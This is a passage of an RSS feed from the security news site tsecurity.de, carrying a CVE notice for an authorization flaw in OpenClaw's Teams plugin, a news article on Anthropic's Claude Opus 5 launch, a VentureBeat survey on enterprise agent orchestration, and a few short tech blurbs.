<title><![CDATA[CVE-2026-34506 | OpenClaw up to 2026.3.7 Microsoft Teams Plugin team/channel groupAllowFrom authorization (GHSA-g7cr-9h7q-4qxq)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in OpenClaw up to 2026.3.7. Affected is an unknown function of the file team/channel of the component Microsoft Teams Plugin. The manipulation of the argument groupAllowFrom leads to incorrect authorization.

This vulnerability is listed as...]]></description>
<link>https://tsecurity.de/de/3692789/sicherheitsluecken/cve-2026-34506-openclaw-up-to-202637-microsoft-teams-plugin-teamchannel-groupallowfrom-authorization-ghsa-g7cr-9h7q-4qxq/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692789/sicherheitsluecken/cve-2026-34506-openclaw-up-to-202637-microsoft-teams-plugin-teamchannel-groupallowfrom-authorization-ghsa-g7cr-9h7q-4qxq/</guid>
<pubDate>Sat, 25 Jul 2026 02:23:50 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/openclaw">OpenClaw up to 2026.3.7</a>. Affected is an unknown function of the file <em>team/channel</em> of the component <em>Microsoft Teams Plugin</em>. The manipulation of the argument <em>groupAllowFrom</em> leads to incorrect authorization.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2026-34506">CVE-2026-34506</a>. The attack may be initiated remotely. There is no available exploit.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anthropic launches Claude Opus 5, a cheaper AI model for coding, agents and enterprise workflows]]></title>
<description><![CDATA[Anthropic released Claude Opus 5 on Friday, a model the company says delivers nearly all the intelligence of its top-of-the-line Claude Fable 5 at half the cost — a launch that signals how the AI race is shifting from raw capability to the economics of daily use.The model, available immediately o...]]></description>
<link>https://tsecurity.de/de/3692246/it-nachrichten/anthropic-launches-claude-opus-5-a-cheaper-ai-model-for-coding-agents-and-enterprise-workflows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3692246/it-nachrichten/anthropic-launches-claude-opus-5-a-cheaper-ai-model-for-coding-agents-and-enterprise-workflows/</guid>
<pubDate>Fri, 24 Jul 2026 20:10:11 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><a href="https://www.anthropic.com/">Anthropic</a> released Claude <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> on Friday, a model the company says delivers nearly all the intelligence of its top-of-the-line Claude <a href="https://www.anthropic.com/claude/fable">Fable 5</a> at half the cost — a launch that signals how the AI race is shifting from raw capability to the economics of daily use.</p><p>The model, available immediately on all of Anthropic's platforms, is priced at $5 per million input tokens and $25 per million output tokens, unchanged from its predecessor, <a href="https://www.anthropic.com/news/claude-opus-4-8">Opus 4.8</a>. It becomes the new default model on <a href="https://support.claude.com/en/articles/11049741-what-is-the-max-plan">Claude Max</a>, Anthropic's premium consumer tier, and the strongest model available on <a href="https://support.claude.com/en/articles/8325606-what-is-the-pro-plan">Claude Pro</a>.</p><p>The positioning is deliberate. Anthropic is not claiming <a href="http://anthropic.com/news/claude-opus-5">Opus 5 </a>is its smartest model — that distinction still belongs to <a href="https://www.anthropic.com/claude/fable">Fable 5</a>, and rival systems retain an edge in certain domains. Instead, the company is making a subtler argument that may matter more to enterprise buyers: that the most economically important AI work happens in a middle band of difficulty, where near-frontier intelligence delivered efficiently and cheaply beats frontier intelligence delivered expensively.</p><p>"Opus 5 as your daily driver, the model you hand complex work to and review when it's done," an Anthropic spokesperson said in an interview with VentureBeat, describing how the company's lineup now stratifies. "Fable 5 for your most ambitious work, the days-long autonomous projects nothing could take on before... Sonnet 5 for work you run at scale, where speed and cost per call decide what ships. Haiku 4.5 for subagents and instant answers."</p><h2><b>How Claude Opus 5 benchmark results stack up against Fable 5 and rival AI models</b></h2><p>On paper, the results are striking. Anthropic says <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> sets new state-of-the-art marks on coding and knowledge-work evaluations including <a href="https://www.frontierbench.ai/announcement">Frontier-Bench</a> and <a href="https://artificialanalysis.ai/evaluations/gdpval-aa">GDPval-AA</a>. On <a href="https://www.frontierbench.ai/announcement">Frontier-Bench v0.1</a>, an agentic terminal coding benchmark, Opus 5 scores 43.3 percent — more than double Opus 4.8's 18.7 percent and well ahead of Fable 5's 33.7 percent — at a lower cost per task, according to the company. On <a href="https://arcprize.org/arc-agi/3">ARC-AGI 3</a>, an evaluation of novel problem-solving, Anthropic reports Opus 5 scored three times as high as the next best model. On <a href="https://github.com/xlang-ai/OSWorld-V2">OSWorld 2.0</a>, a computer-use benchmark, the company says the model surpasses Fable 5's best result at just over a third of the cost.</p><p>The numbers come with honest caveats that are themselves notable in an industry prone to superlatives. Anthropic acknowledges <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> remains behind <a href="https://www.anthropic.com/claude/mythos">Mythos 5</a>, a competing model, on cybersecurity tasks and biology research, and an OpenAI-family model still leads on one agentic coding benchmark.</p><p>The more revealing caveat came from Anthropic itself, when asked where <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> still falls short of <a href="https://www.anthropic.com/claude/fable">Fable 5</a>. The spokesperson's answer amounted to a candid admission about what benchmarks do and don't capture.</p><p>"The evals where Opus 5 wins are bounded tasks with a specific outcome, which is where it's strongest. What those evals don't measure is duration," the spokesperson told VentureBeat. "One way to put it: Opus 5 is the best tool for the jobs benchmarks can see, and Fable 5 is what you reach for when the job outruns the benchmark."</p><p><a href="https://www.anthropic.com/claude/fable">Fable 5</a>, by contrast, "is for the longest, most autonomous jobs, where the model has to stay coherent across many connected steps over hours or days with dense source material," the spokesperson said, advising customers to "run both on a representative workload, one bounded task and one long-horizon job." That framing — bounded tasks versus long-horizon autonomy — may become the defining axis of model differentiation in 2026, as benchmarks saturate and the hardest remaining problems involve sustained, multi-day agentic work rather than discrete puzzles.</p><h2><b>Why token efficiency is becoming the real battleground for enterprise AI spending</b></h2><p>Threaded through the launch is a theme Anthropic clearly wants buyers to absorb: <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> doesn't just score well, it scores well per dollar. The model ships with an adjustable "effort" setting that lets customers trade intelligence for speed and token savings, and Anthropic's charts emphasize performance at a given cost rather than peak performance alone.</p><p>Early customers echoed the point with unusual specificity. Harvey, the legal AI company, said Opus 5 achieved similar performance to Opus 4.8's maximum-reasoning mode "while generating 26% fewer tokens on average," according to Niko Grupen, its head of applied research. Richard Pham of Fundamental Research Lab said that on hard financial-modeling tasks, the model averaged nine percentage points higher accuracy "while using roughly one-third fewer turns and tool calls and 60% less time."</p><p>Wade Foster, chief executive of Zapier, said Opus 5 topped his company's AutomationBench leaderboard "without spending more tokens than prior Claude models," running a full churn-prevention workflow from start to finish. "Previous models didn't pass; Opus 5 hit 100%," he said. Scott Wu, chief executive of Cognition, the company behind the Devin coding agent, said that on FrontierCode 1.1, "Claude Opus 5 approaches Fable-level performance at half the cost," with particular strength in debugging and root-cause analysis.</p><p>The efficiency emphasis reflects commercial reality. Enterprise AI spending is no longer experimental, and inference costs — the price of actually running these models at scale — have become a board-level line item. </p><p>Anthropic's business skews heavily toward API and enterprise usage; according to a February 2026 analysis by <a href="https://research.contrary.com/company/anthropic">Contrary Research</a>, Claude held roughly 40 percent of the enterprise large language model market by usage as of late 2025, and Claude Code alone had reached about $1 billion in annualized revenue. For a company whose customers pay by the token, a model that does more with fewer tokens is not a nice-to-have. It is the product.</p><h2><b>Self-verifying AI agents and what they mean for the hidden costs of automation</b></h2><p>Beyond the numbers, Anthropic is selling a behavioral story: that <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> verifies its work and iterates until it succeeds. The company offered several examples from testing that read like small parables of machine stubbornness.</p><p>In one <a href="https://www.frontierbench.ai/announcement">Frontier-Bench</a> task, the model was asked to reconstruct a machine part as a 3D CAD model from a drawing it was intentionally given no way to view. Rather than fail, Anthropic says, Opus 5 wrote its own computer vision pipeline to extract the geometry from raw pixels — and did so repeatedly, while no competing model solved the task in five attempts. In another case, given a real bug in a popular open-source package manager, the model found the root cause and fixed an edge case the community's own patch had missed; a competing model patched only the symptom and declared victory. An engineer at a trading firm, the company says, used Opus 5 to build a market data feed for a new exchange in a single session and, finding no live feed to validate against, watched the model build its own test harness to check its parsing code.</p><p>Customers described similar behavior in the wild. Cristian Rivera, a staff software engineer at Stripe, said he gave the model "a chief-of-staff role over my dev environments" for a weekend: "it built its own monitor, drove each box, and pulled me in only for the judgment calls."</p><p>This is the capability enterprises actually care about, and it is worth dwelling on why. The gap between a model that produces plausible output and one that verifies its output is the gap between a demo and a deployable system. Most of the hidden cost of enterprise AI today is human review — engineers checking the machine's work. A model that reliably checks its own work compresses that cost, which is precisely why customers keep citing fewer turns, fewer passes, and less time rather than higher raw scores.</p><h2><b>Inside Anthropic's safety strategy: capability gaps, classifiers, and model fallbacks</b></h2><p>The launch also showcases Anthropic's increasingly intricate approach to safety — one that now involves deliberately not teaching its models certain skills. The company says its automated behavioral audit found Opus 5 to be its most aligned model to date, scoring 2.3 on overall misaligned behavior, lower than <a href="https://www.anthropic.com/news/claude-opus-4-8">Opus 4.8</a>, <a href="https://www.anthropic.com/news/claude-sonnet-5">Sonnet 5</a>, or <a href="https://www.anthropic.com/claude/fable">Fable 5</a>, with the lowest rates of deceptive behavior and the least susceptibility to being tricked into misuse.</p><p>On the capability side, Anthropic says it intentionally avoided training <a href="http://anthropic.com/news/claude-opus-5">Opus 5</a> on cyber tasks, as it did with Opus 4.8. The model improved on them anyway — a side effect of general capability gains — and now nearly matches Mythos 5 at finding software vulnerabilities. But it remains far behind at exploiting them: on Anthropic's OSS-Fuzz evaluation, Opus 5 identified vulnerabilities at a 79.4 percent rate, close to Mythos 5's 80 percent, but succeeded at developing exploits in only 4 challenges versus Mythos 5's 13. That asymmetry — strong at defense-relevant discovery, weak at offense-relevant exploitation — appears to be by design, and the safeguards follow the same logic. Anthropic expects Opus 5's cyber classifiers to intervene about 85 percent less often than Fable 5's.</p><p>When a classifier does trigger, requests in <a href="http://claude.ai/">Claude.ai</a>, <a href="https://code.claude.com/docs/en/overview">Claude Code</a>, and <a href="https://claude.com/product/cowork">Claude Cowork</a> fall back to <a href="https://www.anthropic.com/news/claude-opus-4-8">Opus 4.8</a> by default — raising an obvious question: if a request is too risky for one model, why is it acceptable for another? "The model it falls back to has lower capability levels making the risk of harmful use lower as well," the spokesperson said, adding that "there is a message that lets the user know when this occurs and is visible in the chat."</p><p>The logic is defensible, but it reveals how AI safety actually works in 2026: risk is not a property of the question alone, but of the question multiplied by the capability of the system answering it. On biology, the calculus runs the other way. Opus 5 is now Anthropic's most capable generally available model for scientific research — scoring 10.2 percentage points higher than Opus 4.8 on the company's internal chemistry benchmark — though the spokesperson acknowledged that "Mythos 5 remains the stronger model for long-horizon, open-ended work like autonomous drug design campaigns."</p><h2><b>The business stakes behind the launch: a $380 billion valuation and massive compute bets</b></h2><p>The launch lands at a moment of extraordinary commercial momentum — and extraordinary obligations — for Anthropic. Reuters reported in February that the company was valued at <a href="https://www.reuters.com/technology/anthropic-valued-380-billion-latest-funding-round-2026-02-12/">roughly $380 billion</a> in its latest funding round, following a period in which, per Contrary Research's analysis, its annualized revenue climbed from about $1 billion at the end of 2024 to a projected $9 billion by the end of 2025, with internal targets reportedly <a href="https://research.contrary.com/company/anthropic">reaching $20 to $26 billion for 2026</a>. Those targets are underwritten by enormous infrastructure commitments, including a <a href="https://www.anthropic.com/news/microsoft-nvidia-anthropic-announce-strategic-partnerships">reported $30 billion Azure compute deal</a> alongside arrangements with Google Cloud and Nvidia — spending that only pencils out if enterprises keep expanding usage.</p><p>That is the context in which Opus 5's pricing strategy makes sense. Holding the price at Opus 4.8 levels while roughly doubling performance on key agentic benchmarks is effectively a steep price cut per unit of capability, designed to widen the funnel of workloads that are economical to automate. Every task that was marginal at Opus 4.8's cost-per-success becomes viable at Opus 5's — and every viable task is recurring token revenue.</p><p>The regulatory backdrop has grown more complex as well. A U.S. judge gave final approval this week to <a href="https://www.reuters.com/world/us-judge-approves-anthropics-15-billion-settlement-copyright-lawsuit-2026-07-20/">Anthropic's $1.5 billion copyright settlement with book authors</a>, Reuters reported, closing a chapter of litigation over the company's early training data. And in June, Reuters, citing Axios, reported that the U.S. government had moved to <a href="https://www.reuters.com/technology/us-blocks-foreign-access-anthropics-most-advanced-ai-models-axios-reports-2026-06-13/">block foreign access </a>to Anthropic's most advanced models — a reminder that frontier AI is now entangled with export policy in ways that shape which customers can buy what.</p><p>Also shipping Friday: a Fast mode running at roughly 2.5 times default speed at twice the base price, automatic fallback routing on the API, and mid-conversation tool changes that no longer invalidate the prompt cache — a small feature that agent developers may appreciate more than any benchmark. Consistent with prior Opus models, Opus 5 carries no data retention requirements for general access, a point the spokesperson flagged unprompted for customers with "a hard zero data retention requirement." Developers can access the model as claude-opus-5 on the <a href="https://platform.claude.com/login?returnTo=%2F%3F">Claude API</a> starting today.</p><p>Two questions will determine whether the bet pays off: whether <a href="http://anthropic.com/news/claude-opus-5">Opus 5's efficiency claims </a>survive contact with production workloads at scale, and whether enterprises embrace a world where safety classifiers, not users, sometimes decide which model answers. But the deeper message of Friday's launch is that the AI industry's center of gravity has moved. For three years, the labs competed on what their best model could do on its best day. With Opus 5, Anthropic is competing on something less glamorous and far more lucrative: what a very good model can do every day, for half the price. In a market where the frontier keeps moving, Anthropic is wagering that the real fortune lies just behind it.</p><p>
</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The new Lola x Miffy digital camera is extremely cute and ships with a themed wrist charm]]></title>
<description><![CDATA[Let's be honest we mostly wrote about this because we think it's really cute.]]></description>
<link>https://tsecurity.de/de/3691984/it-nachrichten/the-new-lola-x-miffy-digital-camera-is-extremely-cute-and-ships-with-a-themed-wrist-charm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691984/it-nachrichten/the-new-lola-x-miffy-digital-camera-is-extremely-cute-and-ships-with-a-themed-wrist-charm/</guid>
<pubDate>Fri, 24 Jul 2026 18:07:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Let's be honest we mostly wrote about this because we think it's really cute.]]></content:encoded>
</item>
<item>
<title><![CDATA[Agentic orchestration: Enterprise AI organizations have a deployment problem, not a platform problem — and most are calling chatbots agents]]></title>
<description><![CDATA[Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agen...]]></description>
<link>https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689830/it-nachrichten/agentic-orchestration-enterprise-ai-organizations-have-a-deployment-problem-not-a-platform-problem-and-most-are-calling-chatbots-agents/</guid>
<pubDate>Thu, 23 Jul 2026 19:19:45 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Across 101 enterprises, agent orchestration is consolidating onto model-provider platforms — Anthropic’s Claude leads by a wide margin — chosen for the gravity of the underlying model and judged on reliable multi-step execution. But the ambition runs well ahead of the reality: most deployed “agents” are still chatbot wrappers, the control plane enterprises expect is deliberately hybrid to avoid lock-in, and real-time fiscal control over token burn remains the exception.</p><p>This wave of VentureBeat Pulse Research examines enterprise agent orchestration: which platforms enterprises run on, what drives the choice, what they optimize for, how they expect agent control to be structured, and — most revealingly — how orchestrated their deployed “agents” actually are and how tightly they control the cost of running them.</p><p>The central finding is a gap between orchestration ambition and orchestration reality. Enterprises are consolidating fast onto the major model platforms: Anthropic’s Claude is the primary platform for 40%, more than double any rival, followed by Microsoft (18%) and OpenAI (13%). The choice is driven by “model gravity” — native alignment with a state-of-the-art base model (21%) — and success is judged by reliable, multi-step execution (task completion reliability 32%, multi-step workflow management 28%). Yet asked to assess their portfolios honestly, 71% say a quarter or fewer of their deployed “agents” are true multi-step orchestrated workflows rather than single-prompt chatbot wrappers, and only 10% have crossed the halfway mark. The orchestration layer is being built well ahead of the orchestrated portfolio it is meant to run.</p><p>That gap shapes the architecture enterprises are putting in place. By the end of 2026 a clear majority (51%) expect a hybrid control plane — provider-native plus external orchestration — and only 6% expect to hand control to a provider-managed service, because vendor lock-in (35%) is the risk they fear most if control lives inside a model provider. Investment follows the build-out: agent workflow tooling leads the spend (34%), with security and permissions enforcement (25%) behind. And fiscal control lags throughout — more than a quarter (27%) have no real-time way to stop a runaway agent before the bill arrives.</p><h2>Methodology</h2><p>VentureBeat fielded this survey as part of its ongoing Pulse Research series, this instrument focused on enterprise agent orchestration. Responses are filtered to organizations with 100 or more employees (n=101), drawn from a single June 2026 wave; because this is one wave rather than a pooled multi-month sample, the report reads cross-sectionally and does not infer month-over-month trends.</p><p>By organization size the sample is spread evenly across the enterprise bands: 100–499 employees, 2,500–9,999, and 50,000+ (21% each), with 10,000–49,999 and 500–2,499 (19% each). By role it is senior and buyer-credible: product and program managers (15%), CIO/CTO/CISO (13%), consultants and advisors (13%), and a spread of data, AI, and engineering directors and VPs, with an “Other” function at 18%. On purchasing, 81% are recommenders, influencers, or final decision-makers for AI solutions (66% recommender/influencer, 15% final decision-maker). Technology/Software is the largest industry at 44%, followed by Financial Services (17%) and Healthcare/Life Sciences (8%).</p><p>At 101 respondents the sample is robust enough to read directionally with reasonable confidence, though it remains self-selected and is not a probability sample.</p><h2>Finding 1: Orchestration runs on model-provider platforms</h2><p><b>Anthropic’s Claude leads; open frameworks are marginal</b></p><p>We asked which agent orchestration platform enterprises primarily use today. The answer concentrates on the major model providers — and on one in particular.</p><div></div><p>A note on reading these shares. As described in the methodology section, the respondents are self-selected, and this question asked them for a single primary platform — so the figures measure which platform leads each enterprise's deployment, within a self-selected audience of AI-active technical decision-makers. A sample built this way can diverge substantially from spend-weighted market measures, and each VB Pulse survey draws its own sample with its own company-size mix, so vendor figures should not be compared across our surveys either. Read these shares as a portrait of where this cohort has placed its primary orchestration bet today, rather than as market share.</p><p>The model platforms dominate. Anthropic, Microsoft, OpenAI, Google, and Amazon together account for roughly 80% of deployments (81 of 101), while the open frameworks (LangChain/LangGraph) and custom in-house builds that anchor engineering discussion sit in single digits. Anthropic’s lead — 40%, more than double the next platform — mirrors the “model gravity” selection logic in Finding 2: enterprises are choosing the orchestration layer that comes with the model they want to build on. As with the security vendors in the prior agent-security wave, the tools that define the category in technical circles are not yet where enterprise deployment concentrates. A small 3% are not orchestrating at all.</p><p>Respondents rate the platforms they run at 3.94 out of 5 overall (109 answered), with “value for money” specifically at 3.94 and “ease of implementation” the weakest score, at 3.85 — placing orchestration near the bottom of our five-tracker satisfaction range, ahead of only evaluation tooling. A rating just under 4 out of 5, from users of whom 96% plan to change their orchestration approach within the year, reads as provisional acceptance: the platforms work well enough to run today, and not well enough to stop the search for something better. The ratings sit alongside near-universal intent to change; this is a layer enterprises tolerate more than they love.</p><h2>Finding 2: Model gravity drives platform selection</h2><p><b>The base model, not the tooling, decides the platform</b></p><p>We asked what most influenced the orchestration platform choice. The single largest factor is the pull of the underlying model — though flexibility and ease of development follow close behind.</p><div></div><p>Model gravity leading is the selection-side explanation for Anthropic’s platform lead: enterprises pick the orchestration environment closest to the frontier model they have standardized on. But the next tier complicates the picture — flexibility across models and tools (17%) and ease of development (17%) say enterprises also want to avoid being trapped by that choice, foreshadowing the lock-in fear in Finding 6. Security and permissions (14%) and total cost of ownership (11%) round out a pragmatic buying logic. Performance (latency/memory) sits last at 4%, a reminder that at this stage of adoption the binding constraints are model fit and optionality, not raw speed.</p><h2>Finding 3: The job is reliable multi-step execution</h2><p><b>Enterprises just orchestration by whether it completes the work</b></p><p>We asked what enterprises optimize for — their primary success metric for orchestration. Reliability and multi-step workflow management dominate; developer- and user-facing metrics trail.</p><div></div><p>Task completion reliability (32%) and multi-step workflow management (28%) together account for 59% of responses (60 of 101): orchestration succeeds, in the enterprise view, when it reliably carries a task through multiple steps to completion. Developer productivity (17%) matters but is secondary — the inverse of its prominence in framework discussion — and end-user experience (9%) is a minor concern, consistent with orchestration being an internal execution problem rather than a UX one. This reliability-first standard is exactly what makes the Chatbot Trap finding so pointed: enterprises define success as dependable multi-step execution, yet most of their deployed “agents” do not yet do multi-step work at all.</p><p>The trap is not evenly distributed. Splitting the sample by organization size, 77% of smaller enterprises say a quarter or fewer of their agents do true multi-step work, against 62% of larger ones. Larger enterprises are meaningfully further into genuine multi-step deployment; the chatbot trap is, directionally, a mid-market condition.</p><h2>Finding 4: Consolidate, productionize, and build in-house </h2><p><b>Three strategic moves are nearly tied for the year ahead</b></p><p>We asked what major change enterprises anticipate in their orchestration strategy over the next 12 months. Three moves cluster at the top, almost evenly split.</p><div></div><p>The top three — building in-house control (25%), standardizing on one framework (24%), and moving agents from sandbox to production (23%) — are statistically indistinguishable and tell a single story: enterprises are moving from experimentation to operational consolidation. They want fewer frameworks, more production exposure, and more ownership of the control layer; only 4% expect no change. The appetite for custom in-house control planes is notable alongside the platform concentration in Finding 1 — enterprises are standardizing on model-provider platforms while simultaneously planning to wrap them in control logic they own, the hybrid posture that Finding 6 makes explicit.</p><h2>Finding 5: Nearly seven in 10 plan to switch — and the biggest group of movers has no shortlist </h2><p>The strategic change enterprises anticipate (previous finding) comes with vendor motion attached. Asked whether they plan to adopt a new, additional, or replacement agent orchestration platform in the next twelve months, more respondents are moving here than in any other layer we track.</p><div></div><p>Asked which platforms they are considering, the most common answer among those in motion is none yet: 29% of all respondents are evaluating without a shortlist, the largest single response after "not considering a change." Among named candidates, OpenAI leads at 16%, followed by LangChain/LangGraph at 12% and Anthropic at 7% — and notably, the independent frameworks draw roughly double their current usage footprint in forward consideration, the same pattern our security tracker found for specialist vendors. Read with this report's concentration and lock-in findings, the picture completes itself: the major model-platform providers hold roughly four-fifths of today's primary usage, vendor lock-in has become the leading fear, 96% anticipate a strategic change — and now the purchase intent to act on all of it, with the largest bloc of buyers still undecided. The most concentrated layer of the agentic stack is also, as of June, the least settled.</p><h2>Finding 6: Investment flows to workflow tooling</h2><p><b>Tooling and permissions lead the spend; monitoring trails</b></p><p>We asked which orchestration-related investment will grow most next year. Agent workflow tooling leads, with security and permissions enforcement behind.</p><div></div><p>Workflow tooling leading (34%) is the budget-side expression of the reliability-and-multi-step priority in Finding 3: the money is going to the machinery that strings steps together dependably. Security and permissions enforcement (25%) and scaling infrastructure (20%) follow — the investments required to take agents from sandbox into production, the strategic move in Finding 4. Monitoring and debugging draws a smaller 11%, with another 11% reporting flat budgets. The weight on tooling, permissions, and scaling over pure observability signals that enterprises are spending to build and harden orchestration, not merely to watch it run.</p><h2>Finding 7: The control plane will be hybrid — and lock-in is why</h2><p><b>Enterprises expect to split control between providers and their own layer</b></p><p>We asked where enterprises expect the primary control plane for agents to live by the end of 2026, and what worries them most if that control sits inside a model-provider platform. A clear majority expect a hybrid model — and vendor lock-in is the reason.</p><div></div><p>Hybrid control is the dominant expectation by a wide margin (51%), and only 6% expect to hand control to a provider-managed service outright. Read together, the hybrid, custom, and externally-abstracted options — every architecture that keeps control at least partly outside the provider — sum to 88% (89 of 101). The reason surfaces directly when we asked about the risk of provider-resident control: vendor lock-in leads at 35% (35 of 101), ahead of security and permissioning limitations (28%) and inflexibility across models and tools (21%). The pattern echoes the prior wave’s “don’t trust the model to police itself” posture — here, enterprises will build on a provider’s platform but decline to be governed entirely by it. The hybrid control plane is the architectural hedge against the lock-in they most fear.</p><p>The June figure asserting a preference for a hybrid control plane marks movement from earlier. In the April–May survey (n=145), only 34% expected a hybrid control plane, and a greater number (12%) expected to hand control fully to a provider-managed service. These two snapshots don’t yet measure a confirmed longitudinal trend — but the direction of the conversation is unambiguous: toward keeping control.</p><p>Lock-in is also a new arrival as a top concern. In the April–May wave, the leading concern was security and permissioning limitations (32%), with lock-in second at 24%; by June the two had traded places. The worry about provider platforms appears to be maturing from whether they can be secured to whether they can be replaced.</p><h2>Finding 8: The chatbot trap — most “agents” aren’t agents yet</h2><p><b>Enterprises admit most deployments are still chatbot wrappers</b></p><p>We asked enterprises to assess their portfolios honestly: what share of their deployed “agents” are true multi-step orchestrated workflows versus simple single-prompt chatbot wrappers. The answer is the defining finding of this wave.</p><div></div><p>This is the gap at the center of the report. Combining the bottom two bands, 71% of enterprises (72 of 101) say a quarter or fewer of their deployed “agents” are genuinely orchestrated — and just 10% (10 of 101) have crossed the halfway mark. The ambition documented in the earlier findings — model-provider platforms, reliability-first success metrics, production rollouts, a deliberate control architecture — runs well ahead of the deployed reality, which remains overwhelmingly single-prompt assistants dressed as agents. This is less a contradiction than a roadmap: the platforms, budgets, and strategies are being put in place precisely because the orchestrated portfolio is still so thin. The open question for later waves is how fast the reality closes on the ambition.</p><h2>Finding 9: Fiscal control is still reactive</h2><p><b>Only a minority can stop a runaway agent before the bill arrives</b></p><p>Finally, we asked how enterprises enforce fiscal control over agent token consumption — the risk that an autonomous loop exhausts a budget before anyone intervenes. Most rely on native caps or after-the-fact monitoring; real-time programmatic control is the exception.</p><div></div><p>More than a quarter of enterprises (27%) admit they have no real-time, programmatic way to stop an agent before a budget-breaking bill arrives — they learn of it from the logs afterward. Another 32% lean entirely on the native caps and throttles built into their primary platform, a control only as good as the provider’s tooling and one that ties back to the lock-in concern of Finding 6. The enterprises building custom gateways (23%) or exploiting cross-model routing to arbitrage cost (19%) are the ones treating token burn as an engineering problem to be controlled deterministically. As with orchestration maturity, fiscal control is an area where the operational reality lags the ambition: agents are moving toward production faster than the cost-control plane around them is being built.</p><p>It’s worth noting, a split appears according to company size: roughly one in three enterprises under 2,500 employees (34%) exercises only reactive control of agent spend, against 20% of larger enterprises — directional figures, but consistent with the chatbot-trap split. The mid-market is running the least mature agents on the least instrumented budgets.</p><h2>The bottom line: The layer is real; most of the agents aren't yet</h2><p>Organizations with 100 or more employees describe an orchestration strategy that is consolidating quickly and maturing slowly. They are standardizing — for now — on model-provider platforms, which collectively hold roughly four-fifths of primary usage, chosen for the gravity of the underlying model, and they judge success by reliable multi-step execution. Investment is flowing to workflow tooling and permissions, the strategy is to consolidate frameworks and push agents into production, and the control plane they expect is deliberately hybrid, because vendor lock-in is the risk they fear most. But the standardization is provisional: 68% plan to adopt a new, additional, or replacement orchestration platform within twelve months — the highest switching intent of any layer we track — and the largest group of those movers has not yet shortlisted a candidate. Today's concentration describes where enterprises are, and visibly does not describe where they intend to stay.</p><p>But the honest self-assessment punctures the ambition. Seventy-one percent say a quarter or fewer of their deployed "agents" are truly orchestrated, only 10% are past the halfway mark, and more than a quarter cannot stop a runaway agent in real time. The orchestration layer — the platforms, the budgets, the control architecture — is being built ahead of the orchestrated portfolio it is meant to run. At 101 respondents in a single June wave this reads as a clear directional signal rather than a precise measurement: enterprises have decided how they want to orchestrate agents well before most of their agents are doing anything an orchestration layer is for. The questions for subsequent waves are whether the deployed reality closes the gap on the ambition — and, with nearly seven in ten buyers in motion and most of them undecided, which platforms the settled stack finally lands on.</p><hr><p><i>Based on survey responses from 101 qualified enterprise respondents (100+ employees), drawn from a single June 2026 wave. Because this is one wave rather than a pooled multi-month sample, results read directionally rather than as a confirmed trend. Respondents include product and program managers, CIOs, CTOs and CISOs, consultants and advisors, and directors and VPs of data, AI, and engineering, across Technology/Software, Financial Services, Healthcare, and other sectors.</i></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Most RAG Hallucinations Are Extraction Errors: Seven Patterns for a Typed Generation Contract]]></title>
<description><![CDATA[Enterprise Document Intelligence [Vol.1 #8ter] - Naming the RAG error correctly matters: model reads the context, so a wrong answer is an extraction error, not a hallucination. Seven typed-contract patterns keep the generation brick honest, with a decomposition rule for small models
The post Most...]]></description>
<link>https://tsecurity.de/de/3689451/ai-nachrichten/most-rag-hallucinations-are-extraction-errors-seven-patterns-for-a-typed-generation-contract/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689451/ai-nachrichten/most-rag-hallucinations-are-extraction-errors-seven-patterns-for-a-typed-generation-contract/</guid>
<pubDate>Thu, 23 Jul 2026 17:06:24 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Enterprise Document Intelligence [Vol.1 #8ter] - Naming the RAG error correctly matters: model reads the context, so a wrong answer is an extraction error, not a hallucination. Seven typed-contract patterns keep the generation brick honest, with a decomposition rule for small models</p>
<p>The post <a href="https://towardsdatascience.com/most-rag-hallucinations-are-extraction-errors-seven-patterns-for-a-typed-generation-contract/">Most RAG Hallucinations Are Extraction Errors: Seven Patterns for a Typed Generation Contract</a> appeared first on <a href="https://towardsdatascience.com/">Towards Data Science</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Determining the ROI of AI requires data that most companies lack]]></title>
<description><![CDATA[Leadership wants to scale AI. Budgets are tripling. Adoption is up.



Then the CFO asks the question every board now asks: which of these initiatives is actually profitable?



Most organizations cannot answer that question, not because they lack visibility into cost, but because the cost data t...]]></description>
<link>https://tsecurity.de/de/3688477/ai-nachrichten/determining-the-roi-of-ai-requires-data-that-most-companies-lack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688477/ai-nachrichten/determining-the-roi-of-ai-requires-data-that-most-companies-lack/</guid>
<pubDate>Thu, 23 Jul 2026 11:07:22 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
